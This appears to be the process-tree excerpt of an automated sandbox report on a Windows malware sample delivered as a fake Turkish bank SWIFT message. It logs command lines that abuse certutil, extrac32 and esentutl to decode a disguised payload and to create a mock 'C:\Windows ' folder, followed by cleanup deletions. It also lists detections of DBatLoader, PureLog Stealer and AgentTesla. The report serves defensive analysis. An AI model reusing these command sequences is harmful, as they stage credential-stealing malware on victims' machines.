                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7d1510000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:5
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:03:56:06
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\extrac32.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff61c760000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:35'328 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:41330D97BF17D07CD4308264F3032547
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:03:56:07
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Users\Public\alpha.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7d1510000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:9
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:03:56:07
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Users\Public\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7f1340000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:1'651'712 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:13
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:03:56:08
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Users\Public\alpha.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7d1510000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:14
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:03:56:08
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Users\Public\kn.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7f1340000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:1'651'712 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:F17616EC0522FC5633151F7CAA278CAA
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:moderate
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:15
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:03:56:09
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\Users\Public\Libraries\AnyDesk.PIF
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:1'226'240 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:2EF70D96354CC04D9168E8F69E7B17A0
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:Borland Delphi
                                                                                                                                                                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000F.00000003.1293644753.000000007FC50000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000F.00000003.1294144317.000000007F920000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:16
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:03:56:09
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Users\Public\alpha.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7d1510000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:17
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:03:56:09
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Users\Public\alpha.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff7d1510000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:289'792 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:21
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:05:01:06
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\aymtmquJ.cmd" "
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x410000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:22
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:05:01:06
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:23
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:05:01:07
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:352'768 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:24
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:05:01:07
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\ping.exe /d C:\\Users\\Public\\xpha.pif /o
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:352'768 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:25
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:05:01:07
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Users\Public\alpha.pif
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows "
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x420000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:26
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:05:01:08
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Users\Public\alpha.pif
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x420000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:27
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:05:01:08
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\esentutl.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\\Windows\\System32\\esentutl.exe /y C:\Users\Public\Libraries\AnyDesk.PIF /d C:\\Users\\Public\\Libraries\\Juqmtmya.PIF /o
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:352'768 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:5F5105050FBE68E930486635C5557F84
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:28
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:05:01:08
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:29
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:05:01:08
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Users\Public\alpha.pif
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x420000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:30
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:05:01:08
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Users\Public\xpha.pif
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x590000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:18'944 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:31
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:05:01:09
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\Users\Public\Libraries\aymtmquJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:68'096 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:32
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:05:01:09
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Native_neworigin.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\Native_neworigin.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:1'425'408 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:9ECE2AAE8E8FA77849268DDA20CAEC7B
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000020.00000003.1680680146.000000000089E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000020.00000002.1948863536.0000000005180000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000020.00000002.1941635606.0000000003FBE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000020.00000002.1931595213.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.1931595213.0000000002F81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000020.00000002.1931595213.0000000002FDA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000020.00000002.1957754324.0000000005A20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000020.00000002.1916978924.0000000002AE6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:33
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:05:01:09
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user~1\AppData\Local\Temp\Trading_AIBot.exe"
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x550000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:70'656 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:E91A1DB64F5262A633465A0AAFF7A0B0
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                                                                                                                                                                      General

                                                                                                                                                                                                                                                                                                                                                                                                                                      Target ID:34
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start time:05:01:11
                                                                                                                                                                                                                                                                                                                                                                                                                                      Start date:18/11/2024
                                                                                                                                                                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                      Imagebase:0x140000000
                                                                                                                                                                                                                                                                                                                                                                                                                                      File size:1'225'728 bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                      MD5 hash:39868E9AD4918B18A6AD00C9FF3BE84E
                                                                                                                                                                                                                                                                                                                                                                                                                                      Has elevated privileges:true
